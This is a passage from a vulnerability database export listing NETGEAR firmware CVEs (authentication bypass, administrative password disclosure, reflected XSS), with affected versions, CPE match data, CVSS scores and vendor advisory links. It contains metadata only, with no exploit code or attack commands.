"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7000113A-DA3E-4F6E-A926-4682794DBC57",
"versionEndExcluding": "1.0.1.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr3500l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8804FB5C-A72C-4413-8F74-2DCEF216F74A",
"versionEndExcluding": "1.2.0.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr3500l:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C8DE4BFA-41DE-4748-ACC7-14362333A059",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by authentication bypass. This affects R6300v2 before 1.0.4.8, R6400 before 1.0.1.20, R6700 before 1.0.1.20, R6900 before 1.0.1.20, R7000 before 1.0.7.10, R7100LG before V1.0.0.32, R7300DST before 1.0.0.52, R7900 before 1.0.1.16, R8000 before 1.0.3.36, R8300 before 1.0.2.94, R8500 before 1.0.2.94, WNDR3400v3 before 1.0.1.12, and WNR3500Lv2 before 1.2.0.40."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por una omisi\u00f3n de autenticaci\u00f3n. Esto afecta a R6300v2 versiones anteriores a 1.0.4.8, R6400 versiones anteriores a 1.0.1.20, R6700 versiones anteriores a 1.0.1.20, R6900 versiones anteriores a 1.0.1.20, R7000 versiones anteriores a 1.0.7.10, R7100LG versiones anteriores a V1.0.0.32, R7300DST versiones anteriores a 1.0.0.52, R7900 versiones anteriores a 1.0. 1.16, R8000 versiones anteriores a 1.0.3.36, R8300 versiones anteriores a 1.0.2.94, R8500 versiones anteriores a 1.0.2.94, WNDR3400v3 versiones anteriores a 1.0.1.12 y WNR3500Lv2 versiones anteriores a 1.2.0.40."
}
],
"id": "CVE-2017-18743",
"lastModified": "2024-11-21T03:20:48.853",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 6.5,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-23T16:15:12.617",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000051512/Security-Advisory-for-Authentication-Bypass-on-Some-Routers-PSV-2017-0330"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000051512/Security-Advisory-for-Authentication-Bypass-on-Some-Routers-PSV-2017-0330"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-287"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-22 15:15
Modified
2024-11-21 03:20
Severity ?
Summary
Certain NETGEAR devices are affected by administrative password disclosure. This affects D6220 before V1.0.0.28, D6400 before V1.0.0.60, D8500 before V1.0.3.29, DGN2200v4 before 1.0.0.82, DGN2200Bv4 before 1.0.0.82, R6300v2 before 1.0.4.8, R6400 before 1.0.1.20, R6700 before 1.0.1.20, R6900 before 1.0.1.20, R7000 before 1.0.7.10, R7100LG before V1.0.0.32, R7300DST before 1.0.0.52, R7900 before 1.0.1.16, R8000 before 1.0.3.36, R8300 before 1.0.2.94, R8500 before 1.0.2.94, WNDR3400v3 before 1.0.1.12, and WNR3500Lv2 before 1.2.0.40.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| netgear | d6220_firmware | * | |
| netgear | d6220 | - | |
| netgear | d6400_firmware | * | |
| netgear | d6400 | - | |
| netgear | d8500_firmware | * | |
| netgear | d8500 | - | |
| netgear | dgn2200_firmware | * | |
| netgear | dgn2200 | v4 | |
| netgear | dgn2200b_firmware | * | |
| netgear | dgn2200b | v4 | |
| netgear | r6300_firmware | * | |
| netgear | r6300 | v2 | |
| netgear | r6400_firmware | * | |
| netgear | r6400 | - | |
| netgear | r6700_firmware | * | |
| netgear | r6700 | - | |
| netgear | r6900_firmware | * | |
| netgear | r6900 | - | |
| netgear | r7000_firmware | * | |
| netgear | r7000 | - | |
| netgear | r7100lg_firmware | * | |
| netgear | r7100lg | - | |
| netgear | r7300dst_firmware | * | |
| netgear | r7300dst | - | |
| netgear | r7900_firmware | * | |
| netgear | r7900 | - | |
| netgear | r8000_firmware | * | |
| netgear | r8000 | - | |
| netgear | r8300_firmware | * | |
| netgear | r8300 | - | |
| netgear | r8500_firmware | * | |
| netgear | r8500 | - | |
| netgear | wndr3400_firmware | * | |
| netgear | wndr3400 | v3 | |
| netgear | wnr3500l_firmware | * | |
| netgear | wnr3500l | v2 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FA24D11F-7DF0-44E7-B122-7C5853043E71",
"versionEndExcluding": "1.0.0.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3EEA190-2E9C-4586-BF81-B115532FBA23",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2D1F0B30-4BB4-4573-BE0D-381B31CD2A36",
"versionEndExcluding": "1.0.0.60",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7D30939B-86E3-4C78-9B05-686B4994C8B9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "20564DE0-E58D-4628-ADD6-AC7C90AD85F7",
"versionEndExcluding": "1.0.3.29",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0B1B2D12-64D5-4A4C-82C2-D3CAF24BC728",
"versionEndExcluding": "1.0.0.82",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "099184A0-F1C6-4C3F-9C3B-F0B9AC0D4D14",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200b_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "10FC1B1C-1E2C-4B9D-8A08-3D01104FC1AA",
"versionEndExcluding": "1.0.0.82",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200b:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "25090794-A90C-40CD-8E95-87EC4E98B928",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F8097CEE-2577-4C44-9260-8B2DD2D2CA78",
"versionEndExcluding": "1.0.4.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7084EC75-5CAB-4EB3-BAED-00BFF80F71D9",
"versionEndExcluding": "1.0.1.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AA5CCA76-ED97-4B2E-AB06-9C9F375F7C81",
"versionEndExcluding": "1.0.1.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E7A7A9C9-3505-440C-8806-E48AB316C2CC",
"versionEndExcluding": "1.0.1.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B94C2A0A-F26B-4CD2-A91E-DD62C5F788B3",
"versionEndExcluding": "1.0.7.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "833A98AF-A4B0-4C68-AACD-6B3F58E64060",
"versionEndExcluding": "1.0.0.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "02C2BB4F-8FBB-47BF-A05F-72DDC2D0A31B",
"versionEndExcluding": "1.0.0.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "628B45E0-EAE3-4ACD-82EC-8E2250F885BB",
"versionEndExcluding": "1.0.1.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B91B7AB8-E499-416D-8E63-C49CDA753C3C",
"versionEndExcluding": "1.0.3.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A18E8950-B107-4050-AFEF-30C20F6166FA",
"versionEndExcluding": "1.0.2.94",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "58EFB06D-AD59-4F40-B6EC-BD3C1BCACE7A",
"versionEndExcluding": "1.0.2.94",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7000113A-DA3E-4F6E-A926-4682794DBC57",
"versionEndExcluding": "1.0.1.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr3500l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8804FB5C-A72C-4413-8F74-2DCEF216F74A",
"versionEndExcluding": "1.2.0.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr3500l:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C8DE4BFA-41DE-4748-ACC7-14362333A059",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by administrative password disclosure. This affects D6220 before V1.0.0.28, D6400 before V1.0.0.60, D8500 before V1.0.3.29, DGN2200v4 before 1.0.0.82, DGN2200Bv4 before 1.0.0.82, R6300v2 before 1.0.4.8, R6400 before 1.0.1.20, R6700 before 1.0.1.20, R6900 before 1.0.1.20, R7000 before 1.0.7.10, R7100LG before V1.0.0.32, R7300DST before 1.0.0.52, R7900 before 1.0.1.16, R8000 before 1.0.3.36, R8300 before 1.0.2.94, R8500 before 1.0.2.94, WNDR3400v3 before 1.0.1.12, and WNR3500Lv2 before 1.2.0.40."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por una divulgaci\u00f3n de una contrase\u00f1a administrativa. Esto afecta a D6220 versiones anteriores a V1.0.0.28, D6400 versiones anteriores a V1.0.0.60, D8500 versiones anteriores a V1.0.3.29, DGN2200v4 versiones anteriores a 1.0.0.82, DGN2200Bv4 versiones anteriores a 1.0.0.82, R6300v2 versiones anteriores a 1.0.4.8, R6400 versiones anteriores a 1.0.1.20, R6700 versiones anteriores a 1.0.1.20, R6900 versiones anteriores a 1.0.1.20, R7000 versiones anteriores a 1.0.7.10, R7100LG versiones anteriores a V1.0.0.32, R7300DST versiones anteriores a 1.0.0.52, R7900 versiones anteriores a 1.0.1.16, R8000 versiones anteriores a 1.0.3.36, R8300 versiones anteriores a 1.0.2.94, R8500 versiones anteriores a 1.0.2.94, WNDR3400v3 versiones anteriores a 1.0.1.12 y WNR3500Lv2 versiones anteriores a 1.2.0.40."
}
],
"id": "CVE-2017-18777",
"lastModified": "2024-11-21T03:20:53.580",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 8.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.5,
"impactScore": 5.9,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-22T15:15:12.097",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000049551/Security-Advisory-for-Administrative-Password-Disclosure-on-Some-Routers-and-Gateways-PSV-2017-0385"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000049551/Security-Advisory-for-Administrative-Password-Disclosure-on-Some-Routers-and-Gateways-PSV-2017-0385"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-522"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-16 22:15
Modified
2024-11-21 04:39
Severity ?
Summary
Certain NETGEAR devices are affected by reflected XSS. This affects EX7000 before 1.0.0.64, EX6200 before 1.0.3.86, EX6150 before 1.0.0.38, EX6130 before 1.0.0.22, EX6120 before 1.0.0.40, EX6100 before 1.0.2.22, EX6000 before 1.0.0.30, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, R8300 before 1.0.2.94, R7300DST before 1.0.0.62, R7000P before 1.3.0.20, R6900P before 1.3.0.20, R6400 before 1.0.1.32, R6300v2 before 1.0.4.24, R8500 before 1.0.2.94, WNDR3400v3 before 1.0.1.18, and WN2500RPv2 before 1.0.1.52.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| netgear | ex7000_firmware | * | |
| netgear | ex7000 | - | |
| netgear | ex6200_firmware | * | |
| netgear | ex6200 | - | |
| netgear | ex6150_firmware | * | |
| netgear | ex6150 | - | |
| netgear | ex6130_firmware | * | |
| netgear | ex6130 | - | |
| netgear | ex6120_firmware | * | |
| netgear | ex6120 | - | |
| netgear | ex6100_firmware | * | |
| netgear | ex6100 | - | |
| netgear | ex6000_firmware | * | |
| netgear | ex6000 | - | |
| netgear | ex3700_firmware | * | |
| netgear | ex3700 | - | |
| netgear | ex3800_firmware | * | |
| netgear | ex3800 | - | |
| netgear | r8300_firmware | * | |
| netgear | r8300 | - | |
| netgear | r7300dst_firmware | * | |
| netgear | r7300dst | - | |
| netgear | r7000p_firmware | * | |
| netgear | r7000p | - | |
| netgear | r6900p_firmware | * | |
| netgear | r6900p | - | |
| netgear | r6400_firmware | * | |
| netgear | r6400 | - | |
| netgear | r6300_firmware | * | |
| netgear | r6300 | v2 | |
| netgear | r8500_firmware | * | |
| netgear | r8500 | - | |
| netgear | wndr3400_firmware | * | |
| netgear | wndr3400 | v3 | |
| netgear | wn2500rp_firmware | * | |
| netgear | wn2500rp | v2 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E2EC7119-878C-4E8F-97B0-DAD86E138F8C",
"versionEndExcluding": "1.0.0.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9F45B620-60B8-40F3-A055-181ADD71EFFF",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "03DFA0CD-2C01-4885-B126-E24FCA5F9D6B",
"versionEndExcluding": "1.0.3.86",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3186CC67-B567-4A0C-BD2C-0433716FBD1B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F10249E2-7DDE-4E3D-91FE-FB3FBA3682B0",
"versionEndExcluding": "1.0.0.38",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6150:-:*:*:*:*:*:*:*",
"matchCriteriaId": "46452E97-9347-4788-9570-1EECECC7255E",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6130_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "09C02A78-A382-43A0-A20F-D6521F6DD57F",
"versionEndExcluding": "1.0.0.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6130:-:*:*:*:*:*:*:*",
"matchCriteriaId": "305E295C-9C73-4798-A0BE-7973E1EE5EAB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6120_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "12C1BB59-1A89-45B9-A1D2-6D8DFEEC2F16",
"versionEndExcluding": "1.0.0.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6120:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8C6DFDB6-1D7A-459A-8D30-FD4900ED718B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "746ADED9-4517-4482-AAEF-ACD301B433F8",
"versionEndExcluding": "1.0.2.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AB84CD03-765C-4D4F-A176-364F8E72A4E7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7147AB6A-80B2-4468-BF13-5B7554AA5DA3",
"versionEndExcluding": "1.0.0.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "02E7CA7E-E6CA-4BAB-8F40-4731EA523D91",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "54C9BF9A-F891-4337-AAFF-6E192A81B45B",
"versionEndExcluding": "1.0.0.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CDAA5899-B73C-4690-853E-B5400F034BE1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "74109B25-B64E-4166-A7B0-E3DA87B89161",
"versionEndExcluding": "1.0.0.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CC5488D9-651C-4BAB-A141-06B816690D42",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A18E8950-B107-4050-AFEF-30C20F6166FA",
"versionEndExcluding": "1.0.2.94",
